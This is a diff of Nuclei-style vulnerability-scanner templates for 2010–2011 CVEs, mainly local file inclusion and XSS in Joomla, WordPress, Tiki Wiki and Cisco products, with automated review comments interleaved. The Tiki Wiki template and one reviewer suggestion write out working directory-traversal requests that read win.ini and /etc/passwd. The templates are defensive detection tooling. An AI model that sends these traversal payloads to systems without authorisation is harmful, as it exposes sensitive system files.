a/cves/2010/CVE-2010-3426.yaml +++ b/cves/2010/CVE-2010-3426.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/14964 - https://www.cvedetails.com/cve/CVE-2010-3426 + - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt + - http://www.exploit-db.com/exploits/14964 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-3426 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-4231.yaml b/cves/2010/CVE-2010-4231.yaml index 282ff28783..3c77231b1e 100644 --- a/cves/2010/CVE-2010-4231.yaml +++ b/cves/2010/CVE-2010-4231.yaml 
@@ -4,11 +4,16 @@ info: name: Camtron CMNC-200 IP Camera - Directory Traversal author: daffainfo severity: high - description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. + description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 - https://www.exploit-db.com/exploits/15505 - tags: cve,cve2010,iot,lfi + - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt + - http://www.exploit-db.com/exploits/15505/ + remediation: Upgrade to a supported product version. + classification: + cve-id: CVE-2010-4231 + tags: cve,cve2010,iot,lfi,camera requests: - method: GET @@ -19,8 +24,10 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-4239.yaml b/cves/2010/CVE-2010-4239.yaml new file mode 100644 index 0000000000..c2b4d8c476 --- /dev/null +++ b/cves/2010/CVE-2010-4239.yaml 
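Review bot: The rewritten description keeps the misspelling "directory transversal"; the term is "directory traversal", and since the template is tagged `lfi` and matched on `/etc/passwd`, the wording should match the class of bug being probed: `description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory traversal attacks, allowing access to any file on the camera file system.` The added `http://www.exploit-db.com/exploits/15505/` also duplicates the existing `https://www.exploit-db.com/exploits/15505` reference and can be removed.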
@@ -0,0 +1,34 @@ +id: CVE-2010-4239 + +info: + name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion + author: 0x_akoko + severity: critical + description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability. + reference: + - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt + - https://www.openwall.com/lists/oss-security/2010/11/22/9 + - https://security-tracker.debian.org/tracker/CVE-2010-4239 + - https://nvd.nist.gov/vuln/detail/CVE-2010-4239 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2010-4239 + cwe-id: CWE-20 + tags: cve,cve2010,tikiwiki,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + +# Enhanced by mp on 2022/05/18 diff --git a/cves/2010/CVE-2010-4282.yaml b/cves/2010/CVE-2010-4282.yaml index 074fd7401b..527fe7df51 100644 --- a/cves/2010/CVE-2010-4282.yaml +++ b/cves/2010/CVE-2010-4282.yaml @@ -8,7 +8,12 @@ info: reference: - https://www.exploit-db.com/exploits/15643 - https://www.cvedetails.com/cve/CVE-2010-4282 - tags: cve,cve2010,lfi,joomla + - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download + - http://www.exploit-db.com/exploits/15643 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-4282 + tags: cve,cve2010,lfi,joomla,phpshowtime requests: - method: GET @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-4617.yaml b/cves/2010/CVE-2010-4617.yaml index 6b8918ae9b..f172f0e5d8 100644 --- a/cves/2010/CVE-2010-4617.yaml 
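Review bot: The new template only requests `../../../../../../../../../../windows/win.ini`, so a vulnerable Tiki Wiki 5.2 on a Linux host produces no match and the scan reports it clean; the template gives no indication that the traversal is Windows-specific. Adding a `/etc/passwd` path with a regex matcher and `matchers-condition: or` covers both platforms without weakening the existing win.ini check, which keeps its `condition: and` across the three words. The word list `fonts`/`extensions` is fairly generic on its own, so the `[fonts]`/`[extensions]` bracketed forms would be tighter if the matcher is ever loosened. CWE-20 in the classification is what NVD lists, but CWE-22 is the traversal CWE if the classification is meant to be descriptive rather than a copy.

```yaml
  - method: GET
    path:
      - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"
      - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../etc/passwd"

    matchers-condition: or
    matchers:
      # … unchanged: win.ini word matcher (bit app support / fonts / extensions, condition: and) …
      - type: regex
        regex:
          - "root:.*:0:0:"
```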
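Review bot: The reference added to CVE-2010-4282 is a Pandora FMS console security patch on SourceForge, yet the tags line keeps `joomla` and gains `phpshowtime`; a Pandora FMS fix and a Joomla phpshowtime component cannot both be the product this CVE describes. Verify which product NVD assigns to CVE-2010-4282 and remove whichever tags or reference do not belong, otherwise `-tags joomla` scans will run a template whose CVE does not concern Joomla. The added `http://www.exploit-db.com/exploits/15643` is also a duplicate of the https reference already present.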
+++ b/cves/2010/CVE-2010-4617.yaml @@ -4,10 +4,14 @@ info: name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. reference: - https://www.exploit-db.com/exploits/15791 - https://www.cvedetails.com/cve/CVE-2010-4617 + - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-4617 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-4719.yaml b/cves/2010/CVE-2010-4719.yaml index 145fed21d3..a9ab51ae4f 100644 --- a/cves/2010/CVE-2010-4719.yaml +++ b/cves/2010/CVE-2010-4719.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component JRadio - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/15749 - https://www.cvedetails.com/cve/CVE-2010-4719 + - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt + - http://www.exploit-db.com/exploits/15749 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-4719 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-4769.yaml b/cves/2010/CVE-2010-4769.yaml index 3de9150cf4..3613fefedc 100644 --- a/cves/2010/CVE-2010-4769.yaml +++ b/cves/2010/CVE-2010-4769.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php. + description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php. reference: - https://www.exploit-db.com/exploits/15585 - https://www.cvedetails.com/cve/CVE-2010-4769 + - http://secunia.com/advisories/42324 + - http://www.securityfocus.com/bid/44992 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-4769 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-4977.yaml b/cves/2010/CVE-2010-4977.yaml index eb135d7ccc..710afbfc65 100644 --- a/cves/2010/CVE-2010-4977.yaml +++ b/cves/2010/CVE-2010-4977.yaml 
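Review bot: The rewritten description drops the verb and now reads "allows remote attackers to read arbitrary files and possibly unspecified other impacts", which does not parse; the sibling templates in this commit use "and possibly have unspecified other impacts". Suggested line: `description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the task parameter to index.php.` This also restores the missing "for" before "Joomla!".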
@@ -4,10 +4,15 @@ info: name: Joomla! Component Canteen 1.0 - Local File Inclusion author: daffainfo severity: high - description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. + description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. reference: - https://www.exploit-db.com/exploits/34250 - https://www.cvedetails.com/cve/CVE-2010-4977 + - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt + - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-4977 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2010/CVE-2010-5028.yaml b/cves/2010/CVE-2010-5028.yaml index 01a95abcad..bec5af6fe6 100644 --- a/cves/2010/CVE-2010-5028.yaml +++ b/cves/2010/CVE-2010-5028.yaml 
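Review bot: The rewritten description describes a SQL injection in menu.php via the `mealid` parameter, but the template's name says Local File Inclusion, it is tagged `lfi`, and the matcher hunk below checks the response for `root:.*:0:0:`; the metadata and the probe disagree about what is being tested. The added packetstorm reference (`joomlacanteen-lfisql.txt`) suggests the original advisory covered both an LFI and a SQLi, so either the description should describe the LFI this template actually sends, or the request path (outside this hunk) is not exercising CVE-2010-4977 and the CVE mapping needs checking. A triager reading a hit will otherwise go looking for a SQLi that the template never tested.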
@@ -4,10 +4,15 @@ info: name: Joomla! Component JE Job 1.0 - Local File Inclusion author: daffainfo severity: high - description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. + description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. reference: - https://www.exploit-db.com/exploits/12601 - https://www.cvedetails.com/cve/CVE-2010-5028 + - http://www.vupen.com/english/advisories/2010/1269 + - http://www.securityfocus.com/bid/40193 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-5028 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2010/CVE-2010-5278.yaml b/cves/2010/CVE-2010-5278.yaml index d0ad27b0a9..7bc17d9f24 100644 --- a/cves/2010/CVE-2010-5278.yaml +++ b/cves/2010/CVE-2010-5278.yaml 
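Review bot: The rewritten description is a SQL injection via the `catid` parameter, while the template name says Local File Inclusion, the tag is `lfi`, and the matcher hunk below looks for `root:.*:0:0:` in the body. Either the description was copied from the wrong CVE text or the request (outside this hunk) probes an LFI that is not CVE-2010-5028; please confirm against NVD and make the name, description and matcher describe the same flaw. If the CVE really is SQLi-only, the `/etc/passwd` regex cannot confirm it and the template should be re-targeted rather than documented as SQLi.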
@@ -4,10 +4,14 @@ info: name: MODx manager - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter. + description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. reference: - https://www.exploit-db.com/exploits/34788 - https://www.cvedetails.com/cve/CVE-2010-5278 + - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt + - http://secunia.com/advisories/41638 + classification: + cve-id: CVE-2010-5278 tags: cve,cve2010,lfi requests: @@ -27,3 +31,5 @@ requests: - "extensions" condition: and part: body + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2010/CVE-2010-5286.yaml b/cves/2010/CVE-2010-5286.yaml index e27c4edeb5..4513d4a5de 100644 --- a/cves/2010/CVE-2010-5286.yaml +++ b/cves/2010/CVE-2010-5286.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component Jstore - 'Controller' Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34837 - https://www.cvedetails.com/cve/CVE-2010-5286 + - http://www.securityfocus.com/bid/44053 + - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-5286 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-0049.yaml b/cves/2011/CVE-2011-0049.yaml index f916e1470c..3591729937 100644 --- a/cves/2011/CVE-2011-0049.yaml +++ b/cves/2011/CVE-2011-0049.yaml 
@@ -4,11 +4,15 @@ info: name: Majordomo2 - SMTP/HTTP Directory Traversal author: pikpikcu severity: high - description: Directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. + description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. reference: - https://www.exploit-db.com/exploits/16103 - https://nvd.nist.gov/vuln/detail/CVE-2011-0063 - http://www.kb.cert.org/vuls/id/363726 + - https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-0049 tags: cve,cve2011,majordomo2,lfi requests: @@ -21,9 +25,11 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" condition: and - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-1669.yaml b/cves/2011/CVE-2011-1669.yaml index 38bb238226..9594dcd762 100644 --- a/cves/2011/CVE-2011-1669.yaml +++ b/cves/2011/CVE-2011-1669.yaml 
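Review bot: The classification added here records `cve-id: CVE-2011-0049`, but the reference list it sits under still links `https://nvd.nist.gov/vuln/detail/CVE-2011-0063`, a different CVE; the new block makes the mismatch visible without fixing it. Replace that entry with `- https://nvd.nist.gov/vuln/detail/CVE-2011-0049` so the references and the classification agree. The Mozilla Bugzilla attachment added as a reference is plausible as the upstream patch location, but it would help a reader to confirm it is the Majordomo 2 fix rather than something picked up from the wrong CVE alongside the 0063 link.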
@@ -4,10 +4,14 @@ info: name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) author: daffainfo severity: high - description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. + description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 - https://www.exploit-db.com/exploits/17119 + - http://www.securityfocus.com/bid/47146 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-1669 tags: cve,cve2011,wordpress,wp-plugin,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-2744.yaml b/cves/2011/CVE-2011-2744.yaml index 041e731693..c303e15090 100644 --- a/cves/2011/CVE-2011-2744.yaml +++ b/cves/2011/CVE-2011-2744.yaml 
@@ -4,10 +4,14 @@ info: name: Chyrp 2.x - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. + description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. reference: - https://www.exploit-db.com/exploits/35945 - https://www.cvedetails.com/cve/CVE-2011-2744 + - http://www.openwall.com/lists/oss-security/2011/07/13/6 + - http://secunia.com/advisories/45184 + classification: + cve-id: CVE-2011-2744 tags: cve,cve2011,lfi,chyrp requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml index 1cb0a0ac54..6b3715bb3b 100644 --- a/cves/2011/CVE-2011-2780.yaml +++ b/cves/2011/CVE-2011-2780.yaml @@ -1,11 +1,10 @@ id: CVE-2011-2780 info: - name: Chyrp 2.x - Local File Inclusion (LFI) + name: Chyrp 2.x - Local File Inclusion author: daffainfo severity: high - tags: cve,cve2011,lfi,chyrp - description: "Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744." + description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744. reference: - http://www.justanotherhacker.com/advisories/JAHx113.txt - http://www.openwall.com/lists/oss-security/2011/07/13/5 
@@ -17,6 +16,10 @@ info: - http://securityreason.com/securityalert/8312 - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565 - http://www.securityfocus.com/archive/1/518890/100/0/threaded + classification: + cve-id: CVE-2011-2780 + remediation: Upgrade to a supported version. + tags: cve,cve2011,lfi,chyrp requests: - method: GET @@ -28,8 +31,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-3315.yaml b/cves/2011/CVE-2011-3315.yaml index 855379ffba..f5589ecd62 100644 --- a/cves/2011/CVE-2011-3315.yaml +++ b/cves/2011/CVE-2011-3315.yaml 
@@ -4,8 +4,14 @@ info: name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. - reference: https://www.exploit-db.com/exploits/36256 + description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. + reference: + - https://www.exploit-db.com/exploits/36256 + - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-uccx + - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-cucm + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-3315 tags: cve,cve2011,lfi,cisco requests: @@ -18,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml index 1fe124e5d4..43736129ab 100644 --- a/cves/2011/CVE-2011-4336.yaml +++ b/cves/2011/CVE-2011-4336.yaml 
@@ -1,20 +1,21 @@ id: CVE-2011-4336 info: - name: Tiki Wiki CMS Groupware 7.0 has XSS + name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting author: pikpikcu severity: medium - description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php. + description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 - tags: cve,cve2011,xss,tikiwiki classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2011-4336 cwe-id: CWE-79 + remediation: Upgrade to a supported version. + tags: cve,cve2011,xss,tikiwiki requests: - method: GET @@ -36,3 +37,5 @@ requests: part: header words: - text/html + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-4618.yaml b/cves/2011/CVE-2011-4618.yaml index 301cd48ca3..f28fb520ae 100644 --- a/cves/2011/CVE-2011-4618.yaml +++ b/cves/2011/CVE-2011-4618.yaml 
@@ -1,11 +1,18 @@ id: CVE-2011-4618 info: - name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS) + name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618 + description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4618 + - http://www.securityfocus.com/archive/1/520589 + - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities + - http://archives.neohapsis.com/archives/bugtraq/2012-04/0119.html + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-4618 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-4624.yaml b/cves/2011/CVE-2011-4624.yaml index 2ae32f0d66..ec6bb48304 100644 --- a/cves/2011/CVE-2011-4624.yaml +++ b/cves/2011/CVE-2011-4624.yaml 
@@ -1,11 +1,18 @@ id: CVE-2011-4624 info: - name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) + name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 + description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4624 + - http://archives.neohapsis.com/archives/bugtraq/2011-12/0180.html + - http://www.openwall.com/lists/oss-security/2011/12/23/2 + - http://plugins.trac.wordpress.org/changeset/469785 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-4624 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-4804.yaml b/cves/2011/CVE-2011-4804.yaml index f7dc717b28..e24a860822 100644 --- a/cves/2011/CVE-2011-4804.yaml +++ b/cves/2011/CVE-2011-4804.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component com_kp - 'Controller' Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/36598 - https://www.cvedetails.com/cve/CVE-2011-4804 + - http://secunia.com/advisories/46844 + - http://www.securityfocus.com/bid/48944 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-4804 tags: cve,cve2011,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-4926.yaml b/cves/2011/CVE-2011-4926.yaml index bbefdb8002..3a272db8c2 100644 --- a/cves/2011/CVE-2011-4926.yaml +++ b/cves/2011/CVE-2011-4926.yaml 
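Review bot: The new `cve-id: CVE-2011-4804` and the reworded description both refer to the obSuggest (com_obsuggest) component, while the unchanged `name:` context line still says "Joomla! Component com_kp - 'Controller' Local File Inclusion", so the template now disagrees with itself about what it detects. If the description and classification are correct, the name should follow: `name: Joomla! Component obSuggest (com_obsuggest) < 1.8 - Local File Inclusion`. The name line is pre-existing and lies outside the changed lines, but this hunk is where the inconsistency becomes visible.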
@@ -1,11 +1,17 @@ id: CVE-2011-4926 info: - name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS) + name: Adminimize 1.7.22 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926 + description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4926 + - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926 + - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5 + - http://www.openwall.com/lists/oss-security/2012/01/10/9 + classification: + cve-id: CVE-2011-4926 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2011/CVE-2011-5106.yaml b/cves/2011/CVE-2011-5106.yaml index 